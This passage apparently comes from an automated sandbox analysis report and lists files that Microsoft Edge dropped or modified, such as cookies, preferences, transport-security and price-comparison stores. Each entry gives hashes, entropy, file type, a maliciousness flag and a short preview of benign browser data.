C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0cf6023d-0c48-4966-b989-e4ea4bee3881.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2c00031a-bb81-4a65-a0fd-a3ac55e6a4eb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\38b113f2-5656-4799-925f-70872cbfa83c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	355
Entropy (8bit):	5.436883915663644
Encrypted:	false
SSDEEP:	6:YWyWNkIJvXI1YDr9cyR8wXwlmUUAnIMOeVQymV0DlBv31dB8wXwlmUUAnIMp5eVc:YWygXI2pcO+UAnIUvmWBR7N+UAnIL7HQ
MD5:	CA2D9B55E628EFBA097958B9074D6876
SHA1:	05C8154D711F8C02572F2BE8798E9E711A807D99
SHA-256:	202FCDBAAEF140396B49EE6687DD233A7208DB4FC7CF2870F8EC6D1A17EAD399
SHA-512:	198CBFEABDDF00C75C7BA098D297DCABD400166FE708BF6723631138C36AEF43B78EBBB431A9D2EF6625BDA3E63BB7C49CA2D07E2BC0AED22EE97F3D21F3CEE2
Malicious:	false
Preview:	{"sts":[{"expiry":1753553445.602451,"host":"kYxWDeIDVgesBS02XkmPRTIpB0nkimBvKZESXctn8eA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1722017445.602455},{"expiry":1753553447.30401,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1722017447.304013}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4e299a95-84dd-4d35-93c5-a6dcd9f555ca.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	188
Entropy (8bit):	5.340104494092459
Encrypted:	false
SSDEEP:	3:YWRAWNjADFSPI0omRSSXmQh3wYHGKB8HQXwlm9yJUA6XcIR6RX77XMqeVBv4Jsb/:YWyWNkYBv31dB8wXwlmUUAnIMp5eV3SQ
MD5:	BB2B52C5A32167259A841DE4402F51BC
SHA1:	8B005001029DDE1AC29E5187DFA3D69DF2248DD6
SHA-256:	734CD3683B883941C059E319992B4241730613D1A21B32DD0A3E2CB7D987AB40
SHA-512:	1927883291D2FE085E6F2F22836252A5057116304F3887A3F56BAD8794998FD297D73B40ACD8EF1E0875D2936DF3646797629B6FFAB986C2CB824F62336CD5BC
Malicious:	false
Preview:	{"sts":[{"expiry":1753553424.680199,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1722017424.680203}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\75afbbab-1a81-45ce-9f4f-3ed8bbda9fd3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9ab13295-ce85-470d-873d-185086fb2ffc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4534076946839138
Encrypted:	false
SSDEEP:	96:te+Aupb4Z4iT4d4dG0Xv1DrT4ov4iI4QTvI:tTsGUtDrTl
MD5:	F6973C94D07133980B467C532BAF701A
SHA1:	BBB05A546DE68AF5CF0F82ACA37B299785802B25
SHA-256:	911618E0351CE2A033D8BC157076D9DAAB04BD56C78C30BB6164F046950A050C
SHA-512:	048D85C3016EB9E7B506A78CE9CE2416967F3B727D898649647A66EBE1992DDBE8CDA4836A6A70D7F39574D36158A56420C51A3E978A899E6AE5A54424A0DBA5
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.4519423506101286
Encrypted:	false
SSDEEP:	96:eIEumQv8m1ccnvS6KYQBo2dQLUu2YQjQ90UZI17Rh/h1RVkI:eIEumQv8m1ccnvS6/2c2pUZIDhPd
MD5:	07A5054317877CC395E3E881915D1D2F
SHA1:	2DECBFF8700D4498750DC34C2F1FA5E4BB349F7C
SHA-256:	0272036D9D173F6BB945E35EACF96ECD4B644BBF00AEB721AEF69491D2A8AE53
SHA-512:	5868D0E57869B82454799B9BAEC9C2239556695FFB94915AEA173DC85D7870FAE278F09CA1EFF4D80902CE85B448A6386B2BA48AC9D1B4809C262BEB9D547A2F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF44d03.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF46a10.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF4877c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	188
Entropy (8bit):	5.340104494092459
Encrypted:	false
SSDEEP:	3:YWRAWNjADFSPI0omRSSXmQh3wYHGKB8HQXwlm9yJUA6XcIR6RX77XMqeVBv4Jsb/:YWyWNkYBv31dB8wXwlmUUAnIMp5eV3SQ
MD5:	BB2B52C5A32167259A841DE4402F51BC
SHA1:	8B005001029DDE1AC29E5187DFA3D69DF2248DD6
SHA-256:	734CD3683B883941C059E319992B4241730613D1A21B32DD0A3E2CB7D987AB40
SHA-512:	1927883291D2FE085E6F2F22836252A5057116304F3887A3F56BAD8794998FD297D73B40ACD8EF1E0875D2936DF3646797629B6FFAB986C2CB824F62336CD5BC
Malicious:	false
Preview:	{"sts":[{"expiry":1753553424.680199,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1722017424.680203}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF4a593.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	188
Entropy (8bit):	5.340104494092459
Encrypted:	false
SSDEEP:	3:YWRAWNjADFSPI0omRSSXmQh3wYHGKB8HQXwlm9yJUA6XcIR6RX77XMqeVBv4Jsb/:YWyWNkYBv31dB8wXwlmUUAnIMp5eV3SQ
MD5:	BB2B52C5A32167259A841DE4402F51BC
SHA1:	8B005001029DDE1AC29E5187DFA3D69DF2248DD6
SHA-256:	734CD3683B883941C059E319992B4241730613D1A21B32DD0A3E2CB7D987AB40
SHA-512:	1927883291D2FE085E6F2F22836252A5057116304F3887A3F56BAD8794998FD297D73B40ACD8EF1E0875D2936DF3646797629B6FFAB986C2CB824F62336CD5BC
Malicious:	false
Preview:	{"sts":[{"expiry":1753553424.680199,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1722017424.680203}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF4e098.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	188
Entropy (8bit):	5.340104494092459
Encrypted:	false
SSDEEP:	3:YWRAWNjADFSPI0omRSSXmQh3wYHGKB8HQXwlm9yJUA6XcIR6RX77XMqeVBv4Jsb/:YWyWNkYBv31dB8wXwlmUUAnIMp5eV3SQ
MD5:	BB2B52C5A32167259A841DE4402F51BC
SHA1:	8B005001029DDE1AC29E5187DFA3D69DF2248DD6
SHA-256:	734CD3683B883941C059E319992B4241730613D1A21B32DD0A3E2CB7D987AB40
SHA-512:	1927883291D2FE085E6F2F22836252A5057116304F3887A3F56BAD8794998FD297D73B40ACD8EF1E0875D2936DF3646797629B6FFAB986C2CB824F62336CD5BC
Malicious:	false
Preview:	{"sts":[{"expiry":1753553424.680199,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1722017424.680203}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e45390be-7965-4399-95c3-60154c017f89.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f4d6fe4d-f01b-4763-b26f-be92441471ef.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	355
Entropy (8bit):	5.438505479650603
Encrypted:	false
SSDEEP:	6:YWyWNk8KcMJXI1YDr9cyR8wXwlmUUAnIMOeVwURV4mDK8Bv31dB8wXwlmUUAnIMW:YWyJcMJXI2pcO+UAnIUwURB1R7N+UAni
MD5:	AF334754D519C3581D413DA4C5A14773
SHA1:	B981B35F9B79C809961987E2A6CA2F8CB92A7B9A
SHA-256:	571FCE18D1A5EEFD7FB713F9CFE1D7F445CE716E5AEA8BB31E469F3EA942D77F
SHA-512:	A8843FD4074E021E4376D404D0F3022D7162358677B9EDE9ACE5C6D5E0978BAB5FD9531F1B1FA2742D4CA61301041C8ACDACB273828B2AB70494823153FB3EBC
Malicious:	false
Preview:	{"sts":[{"expiry":1753553430.45994,"host":"kYxWDeIDVgesBS02XkmPRTIpB0nkimBvKZESXctn8eA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1722017430.459944},{"expiry":1753553434.952944,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1722017434.952949}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8307038620100359
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAz7Nm2z8ZI7J5fc:T+OUzDbg3eAzA2ztc
MD5:	B18967139991D9CA13DF7E493540A358
SHA1:	97411C14A8503C11248BE7404C9A79BA5146D40C
SHA-256:	CCC36F21951B4CB357C57DA0CCA1FFF3B4C7027230C10FD8BCB72C0AFF66141F
SHA-512:	473AE1B215B181785EA65F87E34155D5976C7AD1FA487B025E1C8711BFD127E99066990105CDA8D6F4804459118361217455AB1644803D22E6ECB164EEEFD630
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9818
Entropy (8bit):	5.112993284878022
Encrypted:	false
SSDEEP:	192:stjkdAs9rsZihUk13s8gbV+FQ6QA66WSiaFIMYFPVYJ:stjbs9rfh8bGFQx6WDaTY4
MD5:	7FCAA517D40906F1A7DF285131AFF087
SHA1:	69FE236B3B2EB7C4CCED0294C97B6AD583AC1DAE
SHA-256:	EB1B36A7DB9F85BB1396F4029EF08BE7F8AE2A54348BC8B9CCF4948AF3FAA6FC
SHA-512:	20F722E8C79EAB6E46307CF0D341CF90A87D5F40B3A6A80E40ABD72D4183207BE0569E7FAA4CA2B53CF250BB7B77FABA00FEBE72F482B014ECCB584767A70A54
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366491012335708","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF483b3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9818
Entropy (8bit):	5.112993284878022
Encrypted:	false
SSDEEP:	192:stjkdAs9rsZihUk13s8gbV+FQ6QA66WSiaFIMYFPVYJ:stjbs9rfh8bGFQx6WDaTY4
MD5:	7FCAA517D40906F1A7DF285131AFF087
SHA1:	69FE236B3B2EB7C4CCED0294C97B6AD583AC1DAE
SHA-256:	EB1B36A7DB9F85BB1396F4029EF08BE7F8AE2A54348BC8B9CCF4948AF3FAA6FC
SHA-512:	20F722E8C79EAB6E46307CF0D341CF90A87D5F40B3A6A80E40ABD72D4183207BE0569E7FAA4CA2B53CF250BB7B77FABA00FEBE72F482B014ECCB584767A70A54
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366491012335708","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4b60e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9818
Entropy (8bit):	5.112993284878022
Encrypted:	false
SSDEEP:	192:stjkdAs9rsZihUk13s8gbV+FQ6QA66WSiaFIMYFPVYJ:stjbs9rfh8bGFQx6WDaTY4
MD5:	7FCAA517D40906F1A7DF285131AFF087
SHA1:	69FE236B3B2EB7C4CCED0294C97B6AD583AC1DAE
SHA-256:	EB1B36A7DB9F85BB1396F4029EF08BE7F8AE2A54348BC8B9CCF4948AF3FAA6FC
SHA-512:	20F722E8C79EAB6E46307CF0D341CF90A87D5F40B3A6A80E40ABD72D4183207BE0569E7FAA4CA2B53CF250BB7B77FABA00FEBE72F482B014ECCB584767A70A54
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366491012335708","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4dfae.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9818
Entropy (8bit):	5.112993284878022
Encrypted:	false
SSDEEP:	192:stjkdAs9rsZihUk13s8gbV+FQ6QA66WSiaFIMYFPVYJ:stjbs9rfh8bGFQx6WDaTY4
MD5:	7FCAA517D40906F1A7DF285131AFF087
SHA1:	69FE236B3B2EB7C4CCED0294C97B6AD583AC1DAE
SHA-256:	EB1B36A7DB9F85BB1396F4029EF08BE7F8AE2A54348BC8B9CCF4948AF3FAA6FC
SHA-512:	20F722E8C79EAB6E46307CF0D341CF90A87D5F40B3A6A80E40ABD72D4183207BE0569E7FAA4CA2B53CF250BB7B77FABA00FEBE72F482B014ECCB584767A70A54
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366491012335708","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	83572
Entropy (8bit):	5.664145578249401
Encrypted:	false
SSDEEP:	1536:ML0/Ry7vm2lhq4ljc+PjfOzBu+RMDVogUlcPCcBjjmny8dLA8j7baD7:ML6yLm2fq4pc+rCAogU2CcBjj3YAg7mn
MD5:	64F95F5162675FAD97904151496D95E9
SHA1:	05B3E08610C19AD0408ECAE09B68EB2CE789D3F0
SHA-256:	BC9413EC97C54E3920F60CE45EE8339DE2804B52DB7AE45863E75C12307A560E
SHA-512:	5500E348B0D4CBA10453066784563F91FDBE3123813A87784F530A5ECA8B193357F1A5332F8CBD0C1251B375D10CEA010FBB227014F1C04CD201B2E24F572B33
Malicious:	false
Preview:	...m.................DB_VERSION.1~..Hj...............(QUERY_TIMESTAMP:product_category_en1...13366491026147340..QUERY:product_category_en1....[{"name":"product_category_en","url":"https://edgeassetservice.azureedge.net/assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories","version":{"major":1,"minor":0,"patch":0},"hash":"r2jWYy3aqoi3+S+aPyOSfXOCPeLSy5AmAjNHvYRv9Hg=","size":82989}]...yg~..............!ASSET_VERSION:product_category_en.1.0.0..ASSET:product_category_en...."..3....Car & Garage..Belts & Hoses.#..+....Sports & Outdoors..Air Pumps.!.."....Car & Garage..Body Styling.4..5./..Gourmet Food & Chocolate..Spices & Seasonings.'..,."..Sports & Outdoors..Sleeping Gear.!..6....Lawn & Garden..Hydroponics.9.a.5..Books & Magazines. Gay & Lesbian Interest Magazines....+....Office Products..Pins.,..3.'..Kitchen & Housewares..Coffee Grinders.$..#....Computing..Enterprise Servers.#..&....Home Furnishings..Footboards.6...2..Books & Magazines..Computer & Internet Magazines.)..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	5.1563691007951675
Encrypted:	false
SSDEEP:	6:BMyXtiBUq1923oH+TcwtgctZQInvB2KLlrMyXQLx1WM+q2P923oH+TcwtgctZQIp:3XtiBUfYebgGZznvFL/X+x1L+v4Yebgi
MD5:	F48C8E61BEC818B5FD8A61C563F7C11E
